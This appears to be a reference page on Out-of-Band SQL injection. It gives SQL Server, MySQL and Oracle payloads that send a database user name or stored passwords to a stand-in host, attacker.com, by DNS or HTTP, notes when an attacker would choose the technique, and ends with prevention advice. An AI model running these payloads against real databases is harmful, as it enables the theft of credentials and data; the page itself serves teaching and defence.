Out-of-Band SQL Injection

Out-of-Band SQL Injection (OOB SQLi) is a technique used when an attacker cannot receive results through the normal response channel. Instead, data is exfiltrated through alternative channels such as DNS lookups or HTTP requests to attacker-controlled servers.

How It Works

The attacker crafts SQL queries that cause the database server to make outbound connections. The exfiltrated data is encoded in the DNS hostname or HTTP request path, allowing retrieval on the attacker's server.

Example

DNS exfiltration (SQL Server):

// Exfiltrate username via DNS lookup
DECLARE @data VARCHAR(100);
SELECT @data = user_name();
EXEC('master..xp_dirtree "\\' + @data + '.attacker.com\x"');

// Attacker receives DNS query for:
// dbo.attacker.com

HTTP exfiltration (MySQL with load_file):

SELECT LOAD_FILE(CONCAT('\\\\',
  (SELECT password FROM users LIMIT 1),
  '.attacker.com\\a'));

Oracle UTL_HTTP:

SELECT UTL_HTTP.REQUEST('http://attacker.com/'||
  (SELECT password FROM users WHERE rownum=1))
FROM dual;

When to Use OOB

No visible output from queries (true blind)
Time-based is too slow or blocked
Firewall blocks responses but allows outbound
Async query execution

Prevention

Use parameterized queries
Restrict database outbound network access
Disable dangerous functions (xp_dirtree, UTL_HTTP)
Monitor for unusual DNS queries

Out-of-Band SQL Injection

How It Works

Example

When to Use OOB

Prevention

See Also